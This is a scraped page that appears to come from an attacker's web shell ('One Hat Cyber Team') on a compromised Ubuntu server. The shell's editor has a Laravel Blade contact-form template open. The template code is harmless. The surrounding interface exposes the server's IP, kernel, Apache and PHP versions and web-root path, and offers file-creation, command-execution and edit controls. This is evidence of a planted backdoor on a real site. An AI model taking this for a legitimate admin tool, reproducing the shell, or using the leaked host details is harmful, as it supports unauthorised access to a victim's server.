⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
wesellnew
/
core
/
resources
/
views
/
front
/
Edit File: contact.blade.php
@extends('master.front') @section('meta')
@endsection @section('title') {{__('Contact')}} @endsection @section('content')
{{ __('Home') }}
{{ __('Contact Us') }}
{{__('Working Days')}}
{{__('Monday-Friday')}}:
{{$setting->friday_start}} - {{$setting->friday_end}}
{{__('Saturday')}}:
{{$setting->satureday_start}} - {{$setting->satureday_end}}
{{__('Store address')}}
{{__('Our address information')}}
{{$setting->footer_address}}
{{$setting->footer_phone}}
@php $links = json_decode($setting->social_link,true)['links']; $icons = json_decode($setting->social_link,true)['icons']; @endphp
@foreach ($links as $link_key => $link)
@endforeach
{{ __('Tell Us Your Message :') }}
@csrf
{{__('First Name')}}
@error('first_name')
{{$message}}
@enderror
{{__('Last Name')}}
@error('last_name')
{{$message}}
@enderror
{{__('E-mail')}}
@error('email')
{{$message}}
@enderror
{{__('Phone')}}
@error('phone')
{{$message}}
@enderror
{{__('Message')}}
@error('message')
{{$message}}
@enderror
@if ($setting->recaptcha == 1)
{!! NoCaptcha::renderJs() !!} {!! NoCaptcha::display() !!} @if ($errors->has('g-recaptcha-response')) @php $errmsg = $errors->first('g-recaptcha-response'); @endphp
{{__("$errmsg")}}
@endif
@endif
{{ __('Send message') }}
@endsection
Simpan